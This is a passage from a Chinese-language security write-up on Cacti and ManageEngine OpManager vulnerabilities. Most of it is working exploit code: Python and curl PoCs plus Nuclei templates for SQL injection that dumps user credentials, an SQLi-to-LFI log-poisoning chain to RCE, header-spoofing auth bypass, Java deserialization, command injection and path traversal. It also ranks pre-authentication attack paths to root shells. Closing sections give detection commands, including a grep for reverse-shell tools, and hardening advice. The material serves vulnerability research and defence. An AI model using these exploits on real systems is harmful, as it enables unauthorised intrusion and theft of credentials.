r = s. get(f "http:// { target} /cacti/index.php" , verify= False )
s. post(f "http:// { target} /cacti/index.php" ,
data= {"action" : "login" , "username" : "admin" , "password" : "admin" },
verify= False )
serialized_payload = 'a:1:{i:0;s:38:"1 OR SLEEP(5)-- -";}'
params = {
"selected_items" : serialized_payload,
"action_receivers" : "1" ,
"drp_action" : "1" ,
"selected_graphs_array" : serialized_payload
}
print(f "[*] Testing blind SQLi on { target} " )
start = time. time()
r = s. get(f "http:// { target} /cacti/managers.php" , params= params, verify= False , timeout= 30 )
elapsed = time. time() - start
if elapsed >= 4.5 :
print(f "[+] SQL Injection confirmed! Response time: { elapsed: .2f } s (>= 5s expected)" )
print("[+] Extracting database version..." )
db_extract = (
'a:1:{i:0;s:100:"1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,'
'(SELECT @@version),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 LIMIT 1-- -";}'
)
params["selected_graphs_array" ] = db_extract
params["selected_items" ] = db_extract
r = s. get(f "http:// { target} /cacti/managers.php" , params= params, verify= False , timeout= 30 )
print(f "[+] Response: { r. text[:300 ]} " )
else :
print(f "[-] Response time: { elapsed: .2f } s - Target may not be vulnerable" )
return r
if __name__ == "__main__" :
if len(sys. argv) < 2 :
print(f "Usage: { sys. argv[0 ]} <target>" )
sys. exit(1 )
exploit_cacti_sqli(sys. argv[1 ]) Nuclei YAML 模板:
id : cacti-cve-2023-51448
info :
name : Cacti - Blind SQL Injection (CVE-2023-51448)
severity : high
description : Blind SQLi in SNMP Notification Receivers managers.php
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2023-51448
tags : cacti,sqli,cve2023
requests :
- raw :
- |
GET /cacti/managers.php?selected_items=a%3A1%3A%7Bi%3A0%3Bs%3A20%3A%221+OR+SLEEP%285%29--+-%22%3B%7D&action_receivers=1&drp_action=1 HTTP/1.1
Host: {{Hostname}}
Cookie: Cacti={{session_id}}
matchers :
- type : word
words :
- "managers"
- "SNMP"
condition : or
- type : status
status :
- 200 CVE-2023-49084:SQL 注入 + LFI 链式 RCE 漏洞背景: Cacti 1.2.25 中 link.php 的 SQL 注入结合本地文件包含(LFI),允许已认证用户在服务器上执行任意代码。攻击链:通过 SQL 注入向 external_links 表写入路径穿越 payload → LFI 读取/包含日志文件 → 日志投毒触发 RCE。CVSS 8.8 High 。
受影响版本:
产品 受影响版本 修复版本 Cacti 1.2.25 1.2.26
HTTP PoC(curl):
curl -X POST "http://TARGET/cacti/pollers.php?header=false" \
-H "Cookie: Cacti=<SESSION>" \
-H "X-Requested-With: XMLHttpRequest" \
-d '__csrf_magic=<CSRF>&name=Main+Poller&hostname=unknown&id=2&dbhost=";INSERT%20INTO%20external_links%20(id,sortorder,enabled,contentfile,title,style)%20values%20(10,2,%22on%22,%22....//....//....//....//opt/cacti/log/cacti.log%22,%22Test%22,%22TAB%22);%20select%20*%20from%20poller%20where%201=1%20and%20%22%22=%22&action=save' Python PoC:
import requests
import sys
import re
def exploit_cacti_lfi_chain (target):
s = requests. Session()
s. headers["User-Agent" ] = "Mozilla/5.0"
r = s. get(f "http:// { target} /cacti/index.php" , verify= False )
csrf_match = re. search(r "__csrf_magic[' \" ]?\s*value=[' \" ]([^' \" ]+)" , r. text)
csrf = csrf_match. group(1 ) if csrf_match else ""
s. post(f "http:// { target} /cacti/index.php" ,
data= {"action" : "login" , "username" : "admin" , "password" : "admin" ,
"__csrf_magic" : csrf},
verify= False )
r = s. get(f "http:// { target} /cacti/pollers.php?action=edit&id=1" , verify= False )
csrf_match = re. search(r "__csrf_magic[' \" ]?\s*value=[' \" ]([^' \" ]+)" , r. text)
csrf = csrf_match. group(1 ) if csrf_match else ""
print("[*] Step 1: SQL Injection to create external link pointing to log file" )
traversal_path = "....//....//....//....//opt/cacti/log/cacti.log"
sqli = (
f '";INSERT INTO external_links (id,sortorder,enabled,contentfile,title,style) '
f 'values (99,2,"on"," { traversal_path} ","Test","TAB"); '
f 'select * from poller where 1=1 and ""="'
)
data = {
"__csrf_magic" : csrf,
"name" : "Main Poller" ,
"hostname" : "unknown" ,
"id" : "2" ,
"dbhost" : sqli,
"action" : "save"
}
s. post(f "http:// { target} /cacti/pollers.php?header=false" , data= data, verify= False )
print("[*] Step 2: Accessing external link to trigger LFI" )
r = s. get(f "http:// { target} /cacti/link.php?id=99" , verify= False )
if r. status_code == 200 and len(r. text) > 100 :
print(f "[+] LFI successful! Got { len(r. text)} bytes from log file" )
print(f "[+] Log content preview: { r. text[:300 ]} " )
else :
print("[-] LFI attempt completed, verify manually" )
return r
if __name__ == "__main__" :
if len(sys. argv) < 2 :
print(f "Usage: { sys. argv[0 ]} <target>" )
sys. exit(1 )
exploit_cacti_lfi_chain(sys. argv[1 ]) Nuclei YAML 模板:
id : cacti-cve-2023-49084
info :
name : Cacti - SQLi + LFI to RCE (CVE-2023-49084)
severity : high
description : SQL injection in pollers.php leading to LFI and RCE via link.php
reference :
- https://github.com/Cacti/cacti/security/advisories/GHSA-pfh9-gwm6-86vp
tags : cacti,lfi,sqli,cve2023,rce
requests :
- raw :
- |
GET /cacti/link.php?id=99 HTTP/1.1
Host: {{Hostname}}
Cookie: Cacti={{session_id}}
matchers :
- type : word
words :
- "cacti"
- "poller"
condition : or
- type : status
status :
- 200 CVE-2023-49085:graph_view.php SQL 注入 漏洞背景: Cacti 1.2.25 的 graph_view.php 中存在 SQL 注入漏洞,允许已认证用户执行任意 SQL 查询。CVSS 8.8 High 。
受影响版本:
产品 受影响版本 修复版本 Cacti 1.2.25 1.2.26
HTTP PoC(curl):
curl -s "http://TARGET/cacti/graph_view.php?action=tree_content&tree_id=1&leaf_id=1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,username,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 FROM cacti.user_auth-- -" \
-H "Cookie: Cacti=<SESSION>" Python PoC:
import requests
import sys
import re
def exploit_graph_view_sqli (target):
s = requests. Session()
s. headers["User-Agent" ] = "Mozilla/5.0"
r = s. get(f "http:// { target} /cacti/index.php" , verify= False )
csrf = re. search(r "value=[' \" ]([^' \" ]+csrf[^' \" ]*)" , r. text)
csrf = csrf. group(1 ) if csrf else ""
s. post(f "http:// { target} /cacti/index.php" ,
data= {"action" : "login" , "username" : "admin" , "password" : "admin" ,
"__csrf_magic" : csrf},
verify= False )
sqli = (
"1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,"
"GROUP_CONCAT(username,0x3a,password SEPARATOR 0x0a),"
"12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 FROM cacti.user_auth-- -"
)
url = f "http:// { target} /cacti/graph_view.php"
params = {
"action" : "tree_content" ,
"tree_id" : "1" ,
"leaf_id" : sqli
}
r = s. get(url, params= params, verify= False )
print(f "[*] Response status: { r. status_code} " )
print(f "[*] Response length: { len(r. text)} chars" )
if r. status_code == 200 :
print("[+] SQL Injection request sent - analyze response for data leak" )
print(f "[+] Response snippet: { r. text[:500 ]} " )
return r
if __name__ == "__main__" :
if len(sys. argv) < 2 :
print(f "Usage: { sys. argv[0 ]} <target>" )
sys. exit(1 )
exploit_graph_view_sqli(sys. argv[1 ]) Nuclei YAML 模板:
id : cacti-cve-2023-49085
info :
name : Cacti - SQL Injection in graph_view (CVE-2023-49085)
severity : high
description : SQL Injection vulnerability in graph_view.php
reference :
- https://github.com/Cacti/cacti/security/advisories
tags : cacti,sqli,cve2023
requests :
- raw :
- |
GET /cacti/graph_view.php?action=tree_content&tree_id=1&leaf_id=1 HTTP/1.1
Host: {{Hostname}}
Cookie: Cacti={{session_id}}
matchers :
- type : word
words :
- "graph"
- "view"
condition : or
- type : status
status :
- 200 CVE-2022-44219:认证绕过实现 SQL 注入 漏洞背景: Cacti 在某些版本中存在认证绕过漏洞,攻击者可通过特定的请求方式跳过身份验证,结合后续的 SQL 注入实现未授权数据库操作。CVSS 9.8 Critical 。
受影响版本:
产品 受影响版本 修复版本 Cacti < 1.2.22 1.2.22
HTTP PoC(curl):
curl -s "http://TARGET/cacti/remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=1" \
-H "X-Forwarded-For: 127.0.0.1" \
-w "\nHTTP Status: %{http_code}\n" Python PoC:
import requests
import sys
def exploit_cacti_auth_bypass (target):
s = requests. Session()
s. headers. update({
"User-Agent" : "Mozilla/5.0" ,
"X-Forwarded-For" : "127.0.0.1"
})
endpoints = [
"/cacti/remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=1" ,
"/cacti/remote_agent.php?action=ping&address=127.0.0.1" ,
"/cacti/remote_agent.php?action=version" ,
]
for endpoint in endpoints:
resp = s. get(f "http:// { target}{ endpoint} " , verify= False , timeout= 10 )
print(f "[ { resp. status_code} ] { endpoint} " )
if resp. status_code == 200 and "error" not in resp. text. lower():
print(f " [+] Possible auth bypass! Response: { resp. text[:200 ]} " )
return True
print("[-] Auth bypass not confirmed on tested endpoints" )
return False
if __name__ == "__main__" :
if len(sys. argv) < 2 :
print(f "Usage: { sys. argv[0 ]} <target>" )
sys. exit(1 )
exploit_cacti_auth_bypass(sys. argv[1 ]) Nuclei YAML 模板:
id : cacti-cve-2022-44219
info :
name : Cacti - Authentication Bypass (CVE-2022-44219)
severity : critical
description : Authentication bypass in Cacti allowing unauthenticated access
reference :
- https://github.com/Cacti/cacti/security/advisories
tags : cacti,auth-bypass,cve2022
requests :
- raw :
- |
GET /cacti/remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=1 HTTP/1.1
Host: {{Hostname}}
X-Forwarded-For: 127.0.0.1
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "poller"
- "data"
condition : or CVE-2022-22151:SQL 注入漏洞 漏洞背景: Cacti 1.2.19 及更早版本中存在 SQL 注入漏洞,影响多个管理接口的参数处理。CVSS 8.8 High 。
受影响版本:
产品 受影响版本 修复版本 Cacti ≤ 1.2.19 1.2.20
HTTP PoC(curl):
curl -s "http://TARGET/cacti/data_debug.php?data_id=1%20OR%201=1&device_id=1&action=view" \
-H "Cookie: Cacti=<SESSION>" Python PoC:
import requests
import sys
import re
def exploit_cacti_data_debug (target):
s = requests. Session()
s. headers["User-Agent" ] = "Mozilla/5.0"
r = s. get(f "http:// { target} /cacti/index.php" , verify= False )
csrf = re. search(r "value=[' \" ]([^' \" ]+csrf[^' \" ]*)" , r. text)
csrf = csrf. group(1 ) if csrf else ""
s. post(f "http:// { target} /cacti/index.php" ,
data= {"action" : "login" , "username" : "admin" , "password" : "admin" ,
"__csrf_magic" : csrf},
verify= False )
sqli_payload = "1 UNION SELECT 1,GROUP_CONCAT(username,0x3a,password),3,4,5,6,7,8,9 FROM cacti.user_auth"
url = f "http:// { target} /cacti/data_debug.php"
params = {
"data_id" : sqli_payload,
"device_id" : "1" ,
"action" : "view"
}
r = s. get(url, params= params, verify= False )
print(f "[*] Status: { r. status_code} , Length: { len(r. text)} " )
print(f "[*] Response: { r. text[:500 ]} " )
return r
if __name__ == "__main__" :
if len(sys. argv) < 2 :
print(f "Usage: { sys. argv[0 ]} <target>" )
sys. exit(1 )
exploit_cacti_data_debug(sys. argv[1 ]) Nuclei YAML 模板:
id : cacti-cve-2022-22151
info :
name : Cacti - SQL Injection (CVE-2022-22151)
severity : high
description : SQL Injection in Cacti data management interfaces
reference :
- https://www.cvedetails.com/vulnerability-list/vendor_id-7458/Cacti.html
tags : cacti,sqli,cve2022
requests :
- raw :
- |
GET /cacti/data_debug.php?data_id=1&action=view HTTP/1.1
Host: {{Hostname}}
Cookie: Cacti={{session_id}}
matchers :
- type : word
words :
- "cacti"
condition : or
- type : status
status :
- 200 0x03 ManageEngine OpManager 高危漏洞 ManageEngine OpManager 是 Zoho 旗下企业级网络监控平台,基于 Java/J2EE 技术栈,提供网络设备监控、流量分析和告警管理。其攻击面包括 Java 反序列化、SQL 注入、路径穿越和未认证接口暴露。
CVE-2021-3287:Java 反序列化未授权 RCE 漏洞背景: ManageEngine OpManager 存在严重的 Java 反序列化漏洞,通过 SUMCommunicationServlet 和 SUMHandshakeServlet 端点,未认证攻击者可执行任意系统命令并获取 root/Administrator 权限。CVSS 10.0 Critical 。Metasploit 已集成利用模块。
漏洞原理: SUMHandshakeServlet(/servlets/com.adventnet.tools.sum.transport.SUMHandshakeServlet)接受序列化的整数 1002 后将 SUMHttpRequestHandler 存入 Session。随后 SUMCommunicationServlet 中的 processSumPDU() 方法直接调用 SUMPDU.deSerializePDU(),使用 Java 原生反序列化处理攻击者数据,触发 gadget chain 执行命令。
受影响版本:
产品 受影响版本 修复版本 OpManager Build 125219 及以下 125220
HTTP PoC(curl):
# Step 1: Handshake - send serialized integer 1002
curl -X POST "http://TARGET:8080/servlets/com.adventnet.tools.sum.transport.SUMHandshakeServlet" \
-H "Content-Type: application/octet-stream" \
--data-binary $'\x00\x00\x04\xd2'
# Step 2: Send deserialization payload via SUMCommunicationServlet
# (Requires serialized Java payload generated via ysoserial)
python3 -c "
import socket, struct
s = socket.socket()
s.connect(('TARGET', 8080))
s.send(b'POST /servlets/com.adventnet.tools.sum.transport.SUMHandshakeServlet HTTP/1.1\r\n')
s.send(b'Host: TARGET:8080\r\nContent-Length: 4\r\n\r\n')
s.send(struct.pack('>i', 1002))
s.recv(4096)
print('[+] Handshake done')
" Python PoC:
import socket
import struct
import sys
def exploit_opmanager_deser (target, port= 8080 ):
print(f "[*] CVE-2021-3287 - ManageEngine OpManager Deserialization RCE" )
print(f "[*] Target: { target} : { port} " )
try :
sock = socket. socket(socket. AF_INET, socket. SOCK_STREAM)
sock. settimeout(10 )
sock. connect((target, port))
handshake = (
b "POST /servlets/com.adventnet.tools.sum.transport.SUMHandshakeServlet HTTP/1.1 \r\n "
f "Host: { target} : { port} \r\n " . encode()
b "Content-Type: application/octet-stream \r\n "
b "Content-Length: 4 \r\n "
b "Connection: keep-alive \r\n\r\n "
+ struct. pack(">i" , 1002 )
)
sock. send(handshake)
resp = sock. recv(4096 )
print(f "[+] Handshake response received: { len(resp)} bytes" )
print("[+] Handshake complete. Session established." )
print("[*] NOTE: Full exploit requires ysoserial-generated payload" )
print("[*] Use Metasploit: use exploit/multi/http/opmanager_sumpdu_deserialization" )
sock. close()
return True
except Exception as e:
print(f "[-] Connection failed: { e} " )
return False
if __name__ == "__main__" :
if len(sys. argv) < 2 :
print(f "Usage: { sys. argv[0 ]} <target> [port]" )
sys. exit(1 )
port = int(sys. argv[2 ]) if len(sys. argv) > 2 else 8080
exploit_opmanager_deser(sys. argv[1 ], port) Nuclei YAML 模板:
id : opmanager-cve-2021-3287
info :
name : ManageEngine OpManager - Deserialization RCE (CVE-2021-3287)
severity : critical
description : Unauthenticated RCE via Java deserialization in SUM servlet
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2021-3287
- https://haxolot.com/posts/2021/manageengine_opmanager_pre_auth_rce/
tags : manageengine,opmanager,rce,cve2021,deserialization
requests :
- raw :
- |
POST /servlets/com.adventnet.tools.sum.transport.SUMHandshakeServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/octet-stream
Content-Length: 4
{{url_decode('\x00\x00\x04\xd2')}}
matchers :
- type : word
words :
- "SumCommunicationServlet"
- "servlets"
condition : or
- type : status
status :
- 200
- 500 CVE-2022-38772:IPv4 地址管理 RCE 漏洞背景: ManageEngine OpManager 及其关联产品(OpManager Plus、OpManager MSP、NCM、NetFlow Analyzer、OpUtils)的 IPv4 地址管理模块存在 RCE 漏洞,允许已认证用户通过 NMAP 功能修改数据库实现远程代码执行。CVSS 8.8 High 。由 Trend Micro ZDI 报告。
受影响版本:
产品 受影响版本 修复版本 OpManager Build 125450 - 126119 126120
HTTP PoC(curl):
curl -X POST "http://TARGET:8080/OpManager/servlet/APMBusinessServiceAction?APIAction=NMAPInventory" \
-H "Cookie: jsessionid=<SESSION>" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "name=test&display_name=test&host='OR+1=1;SELECT+1+INTO+OUTFILE+'/tmp/rce_test'--" Python PoC:
import requests
import sys
def exploit_opmanager_ipv4 (target):
s = requests. Session()
s. headers["User-Agent" ] = "Mozilla/5.0"
print(f "[*] CVE-2022-38772 - OpManager IPv4 Management RCE" )
endpoints_to_check = [
"/OpManager/servlet/APMBusinessServiceAction" ,
"/OpManager/servlet/ApmConfigHandler" ,
"/api/2/inventory/discovery" ,
]
for ep in endpoints_to_check:
resp = s. get(f "http:// { target} :8080 { ep} " , verify= False , timeout= 10 )
print(f "[ { resp. status_code} ] { ep} " )
nmap_payload = {
"APIAction" : "saveNmapConfig" ,
"nmapiprange" : "127.0.0.1/32" ,
"nmapoptions" : "--script=malicious" ,
"name" : "test"
}
resp = s. post(
f "http:// { target} :8080/OpManager/servlet/APMBusinessServiceAction" ,
data= nmap_payload, verify= False , timeout= 10
)
print(f "[*] Response: { resp. status_code} " )
print(f "[*] Body preview: { resp. text[:300 ]} " )
return resp
if __name__ == "__main__" :
if len(sys. argv) < 2 :
print(f "Usage: { sys. argv[0 ]} <target>" )
sys. exit(1 )
exploit_opmanager_ipv4(sys. argv[1 ]) Nuclei YAML 模板:
id : opmanager-cve-2022-38772
info :
name : ManageEngine OpManager - IPv4 Management RCE (CVE-2022-38772)
severity : high
description : RCE via IPv4 address management NMAP feature
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2022-38772
tags : manageengine,opmanager,rce,cve2022
requests :
- raw :
- |
GET /OpManager/servlet/APMBusinessServiceAction?APIAction=NMAPInventory HTTP/1.1
Host: {{Hostname}}
matchers :
- type : word
words :
- "OpManager"
- "nmap"
condition : or
- type : status
status :
- 200
- 302 CVE-2024-5466:Deploy Agent 认证 RCE 漏洞背景: ManageEngine OpManager 的 Deploy Agent 功能存在 RCE 漏洞,拥有 UI “Write” 权限的用户可在部署代理时注入恶意命令。CVSS 8.8 High 。由安全研究员 Daniel Santos 报告。
受影响版本:
产品 受影响版本 修复版本 OpManager Build 128329 及以下 128330
HTTP PoC(curl):
curl -X POST "http://TARGET:8080/OpManager/servlet/ApmConfigHandler" \
-H "Cookie: jsessionid=<SESSION>" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "method=deployAgent&displayName=test&host=127.0.0.1;id" Python PoC:
import requests
import sys
def exploit_deploy_agent (target):
s = requests. Session()
s. headers["User-Agent" ] = "Mozilla/5.0"
print(f "[*] CVE-2024-5466 - OpManager Deploy Agent RCE" )
payload = {
"method" : "deployAgent" ,
"displayName" : "test" ,
"host" : "127.0.0.1" ,
"scriptArgs" : ";id"
}
endpoints = [
"/OpManager/servlet/ApmConfigHandler" ,
"/OpManager/servlet/AgentDeployAction" ,
"/OpManager/api/2/agent/deploy" ,
]
for ep in endpoints:
resp = s. post(
f "http:// { target} :8080 { ep} " ,
data= payload, verify= False , timeout= 10
)
print(f "[ { resp. status_code} ] { ep} - { len(resp. text)} bytes" )
if "uid=" in resp. text or "root" in resp. text:
print(f "[+] Command injection found at { ep} " )
return True
print("[-] Manual verification required" )
return False
if __name__ == "__main__" :
if len(sys. argv) < 2 :
print(f "Usage: { sys. argv[0 ]} <target>" )
sys. exit(1 )
exploit_deploy_agent(sys. argv[1 ]) Nuclei YAML 模板:
id : opmanager-cve-2024-5466
info :
name : ManageEngine OpManager - Deploy Agent RCE (CVE-2024-5466)
severity : high
description : RCE via Deploy Agent option with Write access
reference :
- https://www.manageengine.com/itom/advisory/cve-2024-5466.html
tags : manageengine,opmanager,rce,cve2024
requests :
- raw :
- |
GET /OpManager/servlet/ApmConfigHandler?method=deployAgent HTTP/1.1
Host: {{Hostname}}
matchers :
- type : word
words :
- "agent"
- "deploy"
condition : or
- type : status
status :
- 200
- 403 CVE-2024-6748:URL 监控 SQL 注入 漏洞背景: ManageEngine OpManager 在 URL 监控功能中存在 SQL 注入漏洞,允许已认证用户通过构造恶意 URL 参数执行自定义查询,访问数据库表内容。CVSS 8.3 High 。由 CrisprXiang、Cokebeer 和 LFY 报告。
受影响版本:
产品 受影响版本 修复版本 OpManager Build 128317 及以下 128318
HTTP PoC(curl):
curl -X POST "http://TARGET:8080/OpManager/servlet/ApmConfigHandler" \
-H "Cookie: jsessionid=<SESSION>" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "method=saveURL&urlName=test&url='UNION+SELECT+1,username+FROM+Users--" Python PoC:
import requests
import sys
def exploit_opmanager_sql_injection (target):
s = requests. Session()
s. headers["User-Agent" ] = "Mozilla/5.0"
print(f "[*] CVE-2024-6748 - OpManager URL Monitoring SQLi" )
sqli_payloads = [
"' UNION SELECT 1,2,3--" ,
"' UNION SELECT NULL,username,password FROM Users--" ,
"1' OR '1'='1" ,
]
for payload in sqli_payloads:
data = {
"method" : "testURL" ,
"url" : payload,
"urlName" : "test"
}
resp = s. post(
f "http:// { target} :8080/OpManager/servlet/ApmConfigHandler" ,
data= data, verify= False , timeout= 10
)
print(f "[ { resp. status_code} ] Payload: { payload[:50 ]} ..." )
if resp. status_code == 200 and ("admin" in resp. text. lower() or
"password" in resp. text. lower()):
print(f "[+] SQL Injection confirmed!" )
print(f " Response: { resp. text[:500 ]} " )
return True
print("[-] Testing completed, manual verification required" )
return False
if __name__ == "__main__" :
if len(sys. argv) < 2 :
print(f "Usage: { sys. argv[0 ]} <target>" )
sys. exit(1 )
exploit_opmanager_sql_injection(sys. argv[1 ]) Nuclei YAML 模板:
id : opmanager-cve-2024-6748
info :
name : ManageEngine OpManager - SQL Injection (CVE-2024-6748)
severity : high
description : SQL Injection in URL Monitoring feature
reference :
- https://www.manageengine.com/itom/advisory/cve-2024-6748.html
tags : manageengine,opmanager,sqli,cve2024
requests :
- raw :
- |
POST /OpManager/servlet/ApmConfigHandler HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
method=saveURL&url=test&urlName=test
matchers :
- type : word
words :
- "OpManager"
condition : or
- type : status
status :
- 200
- 500 CVE-2023-47211:MIB Browser 路径穿越 漏洞背景: ManageEngine OpManager 的 MIB Browser 模块存在路径穿越漏洞,允许攻击者通过路径穿越读取/访问系统上的任意文件。CVSS 8.8 High 。
受影响版本:
产品 受影响版本 修复版本 OpManager Build 127259 及以下 127260
HTTP PoC(curl):
curl -s "http://TARGET:8080/OpManager/servlet/MibBrowser?mibFile=../../../../../../etc/passwd" \
-H "Cookie: jsessionid=<SESSION>" Python PoC:
import requests
import sys
def exploit_mib_path_traversal (target):
s = requests. Session()
s. headers["User-Agent" ] = "Mozilla/5.0"
print(f "[*] CVE-2023-47211 - OpManager MIB Browser Path Traversal" )
traversal_payloads = [
"../../../../../../etc/passwd" ,
".. \\ .. \\ .. \\ .. \\ .. \\ Windows \\ System32 \\ drivers \\ etc \\ hosts" ,
"....//....//....//....//etc/passwd" ,
]
for payload in traversal_payloads:
url = f "http:// { target} :8080/OpManager/servlet/MibBrowser"
params = {"mibFile" : payload}
resp = s. get(url, params= params, verify= False , timeout= 10 )
print(f "[ { resp. status_code} ] Path: { payload} " )
if resp. status_code == 200 :
if "root:" in resp. text or "localhost" in resp. text:
print(f "[+] Path traversal confirmed!" )
print(f " File content: \n { resp. text[:500 ]} " )
return True
print("[-] Exploitation attempt completed" )
return False
if __name__ == "__main__" :
if len(sys. argv) < 2 :
print(f "Usage: { sys. argv[0 ]} <target>" )
sys. exit(1 )
exploit_mib_path_traversal(sys. argv[1 ]) Nuclei YAML 模板:
id : opmanager-cve-2023-47211
info :
name : ManageEngine OpManager - Path Traversal (CVE-2023-47211)
severity : high
description : Path Traversal vulnerability in MIB Browser module
reference :
- https://www.manageengine.com/itom/advisory/cve-2023-47211.html
tags : manageengine,opmanager,path-traversal,cve2023
requests :
- raw :
- |
GET /OpManager/servlet/MibBrowser?mibFile=../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition : and
matchers :
- type : word
words :
- "root:"
- "daemon"
condition : or
- type : status
status :
- 200 0x04 公开 PoC 收集情况与利用思路 以下是本专题覆盖的 CVE 公开 PoC 情况汇总:
CVE 公开 PoC 利用框架 利用难度 CVE-2024-24401 GitHub PoC (MAWK0235) sqlmap 低 CVE-2023-47401 技术细节公开 手动利用 中 CVE-2023-47408 Metasploit Module Metasploit 低 CVE-2023-47400 概念代码公开 手动利用 中 CVE-2023-48085 概念代码公开 手动利用 中 CVE-2021-25296 Metasploit Module Metasploit 低 CVE-2022-46169 GitHub 多个 PoC 自动化脚本 低 CVE-2023-51448 概念代码(需申请) sqlmap 中 CVE-2023-49084 GitHub PoC 手动利用 中 CVE-2021-3287 Metasploit Module Metasploit 低 CVE-2022-38772 ZDI 报告 手动利用 中 CVE-2024-5466 Nessus 检测脚本 手动利用 中 CVE-2024-6748 GitHub PoC 手动利用 中 CVE-2023-47211 基础 PoC curl 低
利用思路 1. 认证前攻击路径(最高优先级):
Cacti CVE-2022-46169:伪造 X-Forwarded-For → 命令注入 → shell OpManager CVE-2021-3287:SUM Handshake → Java 反序列化 → root shell Nagios XI CVE-2024-24401:SQL 注入提权 → 链式 RCE 2. 认证后攻击路径(横向扩展):
Nagios XI CVE-2023-47401:管理员权限 → Ansible Vault 注入 → root Nagios XI CVE-2023-47408:已认证 → 命令注入 → apache/nagios 用户 Cacti CVE-2023-51448:Settings/Utilities 权限 → SQLi → 数据库泄露 → RCE 3. 漏洞链式利用:
Cacti CVE-2023-51448 + CVE-2023-49084:SQLi 注入外部链接 → LFI → 日志投毒 → RCE Nagios XI CVE-2024-45772:MIB 上传 + 路径穿越 → Webshell → 持久化 0x05 共性攻击模式分析 通过对三大网络监控平台的漏洞研究,可以总结出以下共性攻击模式:
模式一:输入过滤缺失导致 SQL 注入 典型案例: CVE-2024-24401(Nagios XI)、CVE-2023-51448(Cacti)、CVE-2024-6748(OpManager)
三个平台均存在参数直接拼接 SQL 查询的问题。Nagios XI 的 monitoringwizard.php、Cacti 的 managers.php、OpManager 的 URL 监控功能,均因缺乏参数化查询而受到 SQL 注入影响。根因: PHP/Java 开发者使用字符串拼接构建 SQL 而非 Prepared Statement。
模式二:命令注入——从配置向导到系统 Shell 典型案例: CVE-2023-47408(Nagios XI)、CVE-2022-46169(Cacti)、CVE-2024-5466(OpManager)
网络监控平台需要调用系统工具(Nmap、WMI 检测、Ping 等),当系统命令的参数来源于用户输入但未进行转义时,就会形成命令注入。Cacti 的 poller_id 参数直接进入 exec(),Nagios XI 的主机配置参数进入 shell 调用,OpManager 的 Deploy Agent 功能拼接用户参数到系统命令。
典型案例: CVE-2022-46169(Cacti 认证绕过)、CVE-2021-3287(OpManager 反序列化)
Cacti 使用 X-Forwarded-For Header 进行 poller 客户端身份验证,攻击者伪造该 Header 即可绕过全部认证。OpManager 的 SUM Servlet 端点完全不需要认证即可访问,Java 原生反序列化直接触发 gadget chain。根因: 过度信任客户端可控信息,缺乏服务端验证。
模式四:文件操作链——上传、路径穿越与 LFI 典型案例: CVE-2023-47400(Nagios XI Custom Includes)、CVE-2024-45772(Nagios XI MIB 上传)、CVE-2023-49084(Cacti LFI)
网络监控平台的配置管理、MIB 导入、自定义组件等功能都涉及文件操作。当文件路径、文件名、扩展名的验证不严格时,攻击者可以:
上传 PHP/JSP webshell 实现持久化 利用路径穿越写入 Web 可达目录 通过 LFI 包含日志文件(结合日志投毒实现 RCE) 模式五:配置参数失控——从 Web 到 Root 典型案例: CVE-2023-47401(Nagios XI Ansible Vault)、CVE-2024-25710(Nagios XI BPI)
Nagios XI 的迁移功能和 BPI 组件允许管理员配置高级系统参数,但这些参数被直接传递给 root 权限的 shell 命令或写入 Web 目录。教训: 即使是管理员输入,也需要在命令执行层面进行过滤和转义。
0x06 应急排查与防守建议 快速排查清单 # 1. 检查 Nagios XI 版本
cat /usr/local/nagiosxi/version | head -5
# 或通过 Web 访问: http://TARGET/nagiosxi/login.php 查看页面底部版本号
# 2. 检查 Cacti 版本
cat /var/www/html/cacti/include/version.php | grep VERSION
# 或: grep -i version /opt/cacti/include/config.php
# 3. 检查 OpManager 版本
cat /opt/OpManager/conf/version.txt
# 或通过: http://TARGET:8080/OpManager/ 查看页面底部
# 4. 检查近期异常访问日志(Nagios XI)
grep -E "remote_agent|monitoringwizard|hostconfig|custom-includes|migrate" /var/log/httpd/access_log
# 5. 检查 Webshell 文件
find /var/www/html -name "*.php" -newer /var/www/html/index.php -exec ls -la {} \;
# 6. 检查最近修改的系统文件
find /usr/local/nagios -mtime -7 -type f 2>/dev/null
find /var/www/html/cacti -mtime -7 -type f 2>/dev/null
# 7. 检查异常进程
ps aux | grep -E "nc |ncat |socat |bash -i"
# 8. 检查 Crontab 后门
crontab -l; cat /etc/crontab; ls -la /etc/cron.* 纵深防御建议 1. 网络层隔离:
将监控平台部署在独立的 VLAN 中,通过防火墙限制 Web 管理端口的源 IP 禁止监控平台直接访问互联网(除必要的更新通道) 对监控平台的管理接口启用 VPN 或零信任接入 2. 身份认证加固:
启用多因素认证(MFA/2FA),优先使用 SAML/OIDC 对接企业 SSO 禁用默认账户(nagiosadmin、admin),强制修改默认密码 实施最小权限原则,普通用户不应拥有 Settings/Utilities 权限 审查 X-Forwarded-For 相关配置,确保反向代理正确设置且监控平台信任链完整 3. 应用层安全:
及时升级 :订阅厂商安全公告,第一时间应用安全补丁Nagios XI ≥ 2024R1.4.2、Cacti ≥ 1.2.26、OpManager ≥ 128668 在 Web 服务器层启用 WAF 规则,拦截 SQL 注入和命令注入 payload 为 Nagios Web 用户启用 SELinux/AppArmor 强制模式 4. 日志与监控:
部署 HIDS(OSSEC/Wazuh)监控关键文件完整性 配置 ELK/Splunk 收集 Web 访问日志并设置异常告警 监控以下关键行为:异常的 Web 目录写入、非授权的进程创建、数据库异常查询 对 SSH 暴力破解、Web 目录扫描实施自动封禁 5. 数据库安全:
